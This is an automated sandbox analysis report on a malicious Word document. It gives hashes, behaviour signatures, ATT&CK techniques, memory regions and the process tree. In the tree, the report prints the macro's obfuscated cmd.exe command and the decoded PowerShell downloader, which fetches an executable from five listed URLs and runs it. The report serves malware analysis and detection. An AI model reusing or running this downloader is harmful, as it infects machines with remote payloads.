Analysis

  • max time kernel
    103s
  • max time network
    110s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-04-2024 00:03

General

  • Target

    088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc

  • Size

    138KB

  • MD5

    088e0aa1d899cc55046dcd2f1ae592a3

  • SHA1

    b40b2f3cb411e37f55d101d9019a50666160ff7b

  • SHA256

    302d111df88971a8852fad6dcfc4463c0ee7cbddd465ac127c0702c59d2757cb

  • SHA512

    f60bf916c05b45be2f86a88571fa1d52ea0c4fd4170ccdaf1f26799280d2e14aa366c0e2e22a963f1485592cac3a5b5b662445c3239f6c65cddabe9380b9e644

  • SSDEEP

    1536:dP981ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadk+aRbPJl21X/lnnF:d18GhDS0o9zTGOZD6EbzCdw32NhF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4084
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pmet:vne$=XMC$;'OVL'=IZY$;'865' = wSw$;'TBZ'=jSP$;)'@'(tilpS.'FXXm1xSO/moc.oidutssdnimlacigam//:ptth@k98SL52Oqg/moc.stnapyknufcm//:ptth@lE9pfhVr/moc.namllimleahcim//:ptth@iqRsEeZTG/moc.zyobeniram//:ptth@pFksMeQWB/moc.dleifekaweram//:ptth'=sQD$;tneilCbeW.teN tcejbo-wen=ihP$;'HVk'=wiw$ llehsrewop&&for /L %b in (472,-1,0)do set uw=!uw!!D5:~%b,1!&&if %b equ 0 echo !uw:~-473! |FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^^^|findstr Cons')DO %5 -"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo powershell $wiw='kVH';$Phi=new-object Net.WebClient;$DQs='http://marewakefield.com/BWQeMskFp@http://marineboyz.com/GTZeEsRqi@http://michaelmillman.com/rVhfp9El@http://mcfunkypants.com/gqO25LS89k@http://magicalmindsstudio.com/OSx1mXXF'.Split('@');$PSj='ZBT';$wSw = '568';$YZI='LVO';$CMX=$env:temp+'\'+$wSw+'.exe';foreach($qYv in $DQs){try{$Phi.DownloadFile($qYv, $CMX);$OYq='rtu';If ((Get-Item $CMX).length -ge 80000) {Invoke-Item $CMX;$jbl='MQi';break;}}catch{}}$uGY='AJA'; "
        3⤵
          PID:864
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^|findstr Cons') DO %5 -"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1680
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ftype|findstr Cons
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4836
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ftype"
              5⤵
                PID:4792
              • C:\Windows\system32\findstr.exe
                findstr Cons
                5⤵
                  PID:1064
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1176
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =kVH
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1636

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dc33yhcb.jou.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1176-37-0x000002DD5F7C0000-0x000002DD5F7E2000-memory.dmp
          Filesize

          136KB

        • memory/1176-48-0x000002DD782A0000-0x000002DD78316000-memory.dmp
          Filesize

          472KB

        • memory/1176-47-0x000002DD781D0000-0x000002DD78214000-memory.dmp
          Filesize

          272KB

        • memory/4084-32-0x00000246EAF40000-0x00000246EB740000-memory.dmp
          Filesize

          8.0MB

        • memory/4084-36-0x00000246EEE50000-0x00000246EFE20000-memory.dmp
          Filesize

          15.8MB

        • memory/4084-6-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-8-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-9-0x00007FFD8C5D0000-0x00007FFD8C5E0000-memory.dmp
          Filesize

          64KB

        • memory/4084-11-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-13-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-12-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-15-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-16-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-19-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-18-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-17-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-14-0x00007FFD8C5D0000-0x00007FFD8C5E0000-memory.dmp
          Filesize

          64KB

        • memory/4084-10-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-0-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-33-0x00000246EAF40000-0x00000246EB740000-memory.dmp
          Filesize

          8.0MB

        • memory/4084-34-0x00000246EEE50000-0x00000246EFE20000-memory.dmp
          Filesize

          15.8MB

        • memory/4084-35-0x00000246EAF40000-0x00000246EB740000-memory.dmp
          Filesize

          8.0MB

        • memory/4084-7-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-5-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-4-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-3-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-1-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-68-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-69-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-70-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB

        • memory/4084-71-0x00000246EAF40000-0x00000246EB740000-memory.dmp
          Filesize

          8.0MB

        • memory/4084-72-0x00000246EEE50000-0x00000246EFE20000-memory.dmp
          Filesize

          15.8MB

        • memory/4084-73-0x00000246EAF40000-0x00000246EB740000-memory.dmp
          Filesize

          8.0MB

        • memory/4084-74-0x00000246EAF40000-0x00000246EB740000-memory.dmp
          Filesize

          8.0MB

        • memory/4084-75-0x00000246EEE50000-0x00000246EFE20000-memory.dmp
          Filesize

          15.8MB

        • memory/4084-2-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-96-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-97-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-95-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-98-0x00007FFD8E630000-0x00007FFD8E640000-memory.dmp
          Filesize

          64KB

        • memory/4084-99-0x00007FFDCE5B0000-0x00007FFDCE7A5000-memory.dmp
          Filesize

          2.0MB